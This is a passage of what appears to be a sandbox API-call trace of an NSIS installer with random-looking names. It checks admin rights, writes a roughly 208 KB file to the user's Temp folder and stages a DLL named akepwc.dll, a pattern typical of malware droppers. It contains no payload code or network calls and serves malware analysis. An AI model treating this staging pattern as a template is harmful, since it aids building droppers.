lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0094.151] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0094.151] lstrcpynA (in: lpString1=0x434400, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0094.151] LoadImageA (hInst=0x400000, name=0x67, type=0x1, cx=0, cy=0, fuLoad=0x8040) returned 0x9021f [0094.154] wsprintfA (in: param_1=0x435000, param_2="%d" | out: param_1="1033") returned 4 [0094.154] lstrlenA (lpString="jwfmxhqapdbzygp") returned 15 [0094.154] lstrcpynA (in: lpString1=0x42e420, lpString2="jwfmxhqapdbzygp Setup", iMaxLength=1024 | out: lpString1="jwfmxhqapdbzygp Setup") returned="jwfmxhqapdbzygp Setup" [0094.154] SetWindowTextA (hWnd=0x0, lpString="jwfmxhqapdbzygp Setup") returned 0 [0094.154] lstrcpynA (in: lpString1=0x709014, lpString2="candwykmjhzwxx", iMaxLength=1024 | out: lpString1="candwykmjhzwxx") returned="candwykmjhzwxx" [0094.154] lstrcpynA (in: lpString1=0x70942c, lpString2="vdevhzaateyt", iMaxLength=1024 | out: lpString1="vdevhzaateyt") returned="vdevhzaateyt" [0094.154] lstrcpynA (in: lpString1=0x709844, lpString2="cojmngggdtim", iMaxLength=1024 | out: lpString1="cojmngggdtim") returned="cojmngggdtim" [0094.154] lstrcpynA (in: lpString1=0x709c5c, lpString2="cremvnasdyf", iMaxLength=1024 | out: lpString1="cremvnasdyf") returned="cremvnasdyf" [0094.154] ShowWindow (hWnd=0x0, nCmdShow=5) returned 0 [0094.154] GetSystemDirectoryA (in: lpBuffer=0x19fc9c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0094.154] wsprintfA (in: param_1=0x19fcaf, param_2="%s%s.dll" | out: param_1="\\RichEd20.dll") returned 13 [0094.154] LoadLibraryExA (lpLibFileName="C:\\Windows\\system32\\RichEd20.dll", hFile=0x0, dwFlags=0x8) returned 0x6c430000 [0095.902] GetClassInfoA (in: hInstance=0x0, lpClassName="RichEdit20A", lpWndClass=0x42e3c0 | out: lpWndClass=0x42e3c0) returned 1 [0095.903] DialogBoxParamA (hInstance=0x400000, lpTemplateName=0x69, hWndParent=0x0, lpDialogFunc=0x4039b0, dwInitParam=0x0) [0097.162] GetDlgItem (hDlg=0x40148, nIDDlgItem=1) returned 0x40274 [0097.162] GetDlgItem (hDlg=0x40148, nIDDlgItem=2) returned 0xb00ec [0097.162] SetDlgItemTextA (hDlg=0x40148, nIDDlgItem=1028, lpString="Nullsoft Install System v2.51") returned 1 [0097.162] SetClassLongA (hWnd=0x40148, nIndex=-14, dwNewLong=590367) returned 0x0 [0097.165] lstrcpynA (in: lpString1=0x42dbc0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0097.165] lstrlenA (lpString="") returned 0 [0097.165] lstrcpynA (in: lpString1=0x40a440, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0097.166] lstrcpynA (in: lpString1=0x40a840, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0097.166] lstrcmpiA (lpString1="", lpString2="") returned 0 [0097.166] lstrcpynA (in: lpString1=0x42dbc0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0097.166] lstrlenA (lpString="") returned 0 [0097.166] lstrcpynA (in: lpString1=0x719fdc, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0097.166] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0097.166] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0097.166] lstrcpynA (in: lpString1=0x40a040, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0097.166] GetTickCount () returned 0x1b9cdfd [0097.166] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpPrefixString="nsp", uUnique=0x0, lpTempFileName=0x42f000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nspcdfe.tmp")) returned 0xcdfe [0097.169] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.169] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned 48 [0097.169] lstrcpynA (in: lpString1=0x409c40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.169] lstrcpynA (in: lpString1=0x42b4a8, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.169] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned 48 [0097.169] FindFirstFileA (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", lpFindFileData=0x42c0f0 | out: lpFindFileData=0x42c0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1c2731, ftCreationTime.dwHighDateTime=0x1d7b436, ftLastAccessTime.dwLowDateTime=0xe1c2731, ftLastAccessTime.dwHighDateTime=0x1d7b436, ftLastWriteTime.dwLowDateTime=0xe1c2731, ftLastWriteTime.dwHighDateTime=0x1d7b436, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f004c, dwReserved1=0x610063, cFileName="nspCDFE.tmp", cAlternateFileName="")) returned 0x6f5770 [0097.169] FindClose (in: hFindFile=0x6f5770 | out: hFindFile=0x6f5770) returned 1 [0097.169] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nspcdfe.tmp")) returned 1 [0097.170] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.170] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned 48 [0097.172] lstrcpynA (in: lpString1=0x40a040, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.172] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0097.172] GetLastError () returned 0xb7 [0097.172] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0097.173] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0097.173] GetLastError () returned 0xb7 [0097.173] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0097.173] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0097.173] GetLastError () returned 0xb7 [0097.173] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0097.174] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0097.174] GetLastError () returned 0xb7 [0097.174] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0097.174] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0097.174] GetLastError () returned 0xb7 [0097.174] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0097.174] GetModuleHandleA (lpModuleName="SHELL32") returned 0x74a90000 [0097.175] GetProcAddress (hModule=0x74a90000, lpProcName=0x2a8) returned 0x74d3db90 [0097.175] IsUserAnAdmin () returned 1 [0097.175] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nspcdfe.tmp"), lpSecurityAttributes=0x19f5c0) returned 1 [0097.176] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.176] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned 48 [0097.176] lstrcpynA (in: lpString1=0x409c40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.176] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned 48 [0097.176] lstrcpynA (in: lpString1=0x435800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.177] lstrcpynA (in: lpString1=0x42f000, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0097.177] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0097.177] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0097.177] lstrcpynA (in: lpString1=0x40a040, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0097.177] CreateDirectoryA (lpPathName="C:\\Users" (normalized: "c:\\users"), lpSecurityAttributes=0x0) returned 0 [0097.177] GetLastError () returned 0xb7 [0097.177] GetFileAttributesA (lpFileName="C:\\Users" (normalized: "c:\\users")) returned 0x11 [0097.178] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx"), lpSecurityAttributes=0x0) returned 0 [0097.178] GetLastError () returned 0xb7 [0097.178] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1" (normalized: "c:\\users\\rdhj0cnfevzx")) returned 0x10 [0097.178] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata"), lpSecurityAttributes=0x0) returned 0 [0097.178] GetLastError () returned 0xb7 [0097.178] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata")) returned 0x12 [0097.178] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local"), lpSecurityAttributes=0x0) returned 0 [0097.178] GetLastError () returned 0xb7 [0097.179] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local")) returned 0x10 [0097.179] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0097.179] GetLastError () returned 0xb7 [0097.179] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0097.179] lstrcpynA (in: lpString1=0x434800, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0097.179] SetCurrentDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 1 [0097.180] lstrcpynA (in: lpString1=0x40a840, lpString2="4gyujazywsbdaoe", iMaxLength=1024 | out: lpString1="4gyujazywsbdaoe") returned="4gyujazywsbdaoe" [0097.180] lstrcpynA (in: lpString1=0x409c40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" [0097.180] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0097.180] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0097.180] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpString2="4gyujazywsbdaoe" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" [0097.180] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\4gyujazywsbdaoe")) returned 0xffffffff [0097.180] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\4gyujazywsbdaoe")) returned 0xffffffff [0097.180] CreateFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\4gyujazywsbdaoe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\4gyujazywsbdaoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x28 [0097.181] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=40688, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ef0 [0097.181] ReadFile (in: hFile=0x1f8, lpBuffer=0x19f798, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x19f798*, lpNumberOfBytesRead=0x19f71c*=0x4, lpOverlapped=0x0) returned 1 [0097.181] GetTickCount () returned 0x1b9ce1c [0097.181] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.183] GetTickCount () returned 0x1b9ce1c [0097.183] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4f91, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4f91, lpOverlapped=0x0) returned 1 [0097.186] GetTickCount () returned 0x1b9ce1c [0097.186] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.186] GetTickCount () returned 0x1b9ce1c [0097.186] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x41a9, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x41a9, lpOverlapped=0x0) returned 1 [0097.187] GetTickCount () returned 0x1b9ce1c [0097.187] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.187] GetTickCount () returned 0x1b9ce1c [0097.187] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4279, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4279, lpOverlapped=0x0) returned 1 [0097.188] GetTickCount () returned 0x1b9ce1c [0097.188] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.188] GetTickCount () returned 0x1b9ce1c [0097.188] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x42d5, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x42d5, lpOverlapped=0x0) returned 1 [0097.189] GetTickCount () returned 0x1b9ce1c [0097.189] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.189] GetTickCount () returned 0x1b9ce1c [0097.189] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4259, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4259, lpOverlapped=0x0) returned 1 [0097.190] GetTickCount () returned 0x1b9ce1c [0097.190] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.190] GetTickCount () returned 0x1b9ce1c [0097.190] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x453b, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x453b, lpOverlapped=0x0) returned 1 [0097.191] GetTickCount () returned 0x1b9ce1c [0097.191] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.191] GetTickCount () returned 0x1b9ce1c [0097.191] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x40b3, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x40b3, lpOverlapped=0x0) returned 1 [0097.191] GetTickCount () returned 0x1b9ce1c [0097.191] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.191] GetTickCount () returned 0x1b9ce1c [0097.191] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4000, lpOverlapped=0x0) returned 1 [0097.229] GetTickCount () returned 0x1b9ce4b [0097.230] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.230] GetTickCount () returned 0x1b9ce4b [0097.230] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x3fd2, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x3fd2, lpOverlapped=0x0) returned 1 [0097.230] GetTickCount () returned 0x1b9ce4b [0097.230] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.231] GetTickCount () returned 0x1b9ce4b [0097.231] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4166, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4166, lpOverlapped=0x0) returned 1 [0097.232] GetTickCount () returned 0x1b9ce4b [0097.232] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.232] GetTickCount () returned 0x1b9ce4b [0097.232] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x3ff8, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x3ff8, lpOverlapped=0x0) returned 1 [0097.233] GetTickCount () returned 0x1b9ce4b [0097.233] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x4000, lpOverlapped=0x0) returned 1 [0097.233] GetTickCount () returned 0x1b9ce4b [0097.233] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x4000, lpOverlapped=0x0) returned 1 [0097.233] GetTickCount () returned 0x1b9ce4b [0097.233] ReadFile (in: hFile=0x1f8, lpBuffer=0x414c48, nNumberOfBytesToRead=0x2f36, lpNumberOfBytesRead=0x19f71c, lpOverlapped=0x0 | out: lpBuffer=0x414c48*, lpNumberOfBytesRead=0x19f71c*=0x2f36, lpOverlapped=0x0) returned 1 [0097.234] GetTickCount () returned 0x1b9ce4b [0097.234] MulDiv (nNumber=208694, nNumerator=100, nDenominator=208694) returned 100 [0097.234] wsprintfA (in: param_1=0x19f72c, param_2="... %d%%" | out: param_1="... 100%") returned 8 [0097.234] WriteFile (in: hFile=0x28, lpBuffer=0x418c48*, nNumberOfBytesToWrite=0x2f33, lpNumberOfBytesWritten=0x19f770, lpOverlapped=0x0 | out: lpBuffer=0x418c48*, lpNumberOfBytesWritten=0x19f770*=0x2f33, lpOverlapped=0x0) returned 1 [0097.234] SetFileTime (hFile=0x28, lpCreationTime=0x19f928, lpLastAccessTime=0x0, lpLastWriteTime=0x19f928) returned 1 [0097.235] CloseHandle (hObject=0x28) returned 1 [0097.242] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.242] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned 48 [0097.242] lstrcpynA (in: lpString1=0x40a440, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.242] lstrcpynA (in: lpString1=0x40a840, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0097.242] lstrcmpiA (lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", lpString2="") returned 1 [0097.242] lstrcpynA (in: lpString1=0x42dbc0, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp" [0097.243] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp") returned 48 [0097.243] lstrcpynA (in: lpString1=0x40a840, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll" [0097.243] lstrcpynA (in: lpString1=0x409c40, lpString2="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll" [0097.243] GetFileAttributesA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nspCDFE.tmp\\akepwc.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nspcdfe.tmp\\akepwc.dll")) returned 